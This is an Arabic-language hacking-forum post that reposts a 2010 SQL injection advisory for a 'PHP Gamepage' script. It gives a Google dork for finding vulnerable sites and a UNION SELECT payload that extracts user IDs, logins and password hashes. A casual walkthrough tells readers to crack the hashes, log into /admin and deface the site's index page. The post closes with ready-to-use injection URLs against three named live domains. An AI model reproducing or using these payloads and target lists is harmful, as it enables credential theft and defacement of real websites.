:: vBspiders Professional Network :: - [ثغرة]~> بتاريخ 17/5/2010 (بتاريخ اليوم) SQL ++ مواقع محقونة .. الحق

الثـغرهـ

كود:



# Title: PHP Gamepage SQL Injection Vulnerability 

  # EDB-ID: 12634 

# CVE-ID: () 

# OSVDB-ID: () 

# Author: v4lc0m87  

# Published: 2010-05-17 

# Verified: yes 

# Download Exploit Code

# Download N/A

 

 view source
 print?
 

*************************************************************************

 ,                               

 |       ,---. ,   . |---. ,---. ,---.   ,---. ,---. ,---. ,   .   ,

 |  ---  |     |   | |   | |---' |       |     |     |---' |   |   |

 |       `---' `---| `---' `---' `       `---' `     `---' `---`---

 `             `---'                                                   

*************************************************************************

[V] PHP Gamepage SQL Injection Vulnerability

 

            --==[ Author ]==--

[+] Author  : v4lc0m87

[+] Contact : valcom87[at]gmail[dot]com

[+] Group   : INDONESIAN CYBER

[+] Site    : http://indonesian-cyber.org/

[+] Date    : May, 17-2010 [INDONESIA]

 

*************************************************************************

            --==[ Details ]==--

 

[+] Vulnerable  : SQL Injection

[+] Google Dork : inurl:index.php?title=gamepage

 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

[-] Exploit:

[+] -111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--

 

[-] Remote SQLi p0c:

[+] http://127.0.0.1/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--

     

 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | TECON-CREW.ORG

 

[V] thx to:

SaruKusai (putus nyambung terus,hahha) MarilynMesum (smoga jadi bassis terbaik)

Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)

Bocah tua nakal (mbah l4mpor,awchoy)

flyff666 cruz3N petimati spykit v3n0m uzanc

kokoh wisdom (program jadi rokok 3 slop marlboro menthol wkwkwkwk)

blue screen, skutengboy (kalian pasangan yg serasi, jikakakakakk)

[K]urabu[S]aru [RnR] cO2 community

and y0u !!

شرح الثغرهـ

نسحب الدورك من اجريه :00001867[1]:
ونرميه عند عمنا جوجل :a43:
الدورك
inurl:index.php?title=gamepage

تيجيك مواقع قد شعر راسك ..

نروح على موقع ونخلي الرابط هيكـ ..
http://XXX.XX/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0 ,0,0,0,0,0,0+from+cw2_user--

يجينا الباس مشفر , روح فكه وانت تضحك smilies8 < تنساش تضحك :dd:

وروح على مسار لوحة التحكم يلي هي ..
http://XXX.XX/admin

وسلامتك ما احلى بجامتك ,
تنسوناش بالإندكس

مواقع محقونة ..

كود PHP:

   http://www.city-interactive.info/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws%280x3a,id,login,pass%29v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--

http://city-interactive.com.pl/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws%280x3a,id,login,pass%29v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--

http://www.city-interactive-games.biz/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws%280x3a,id,login,pass%29v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--

سلآلآم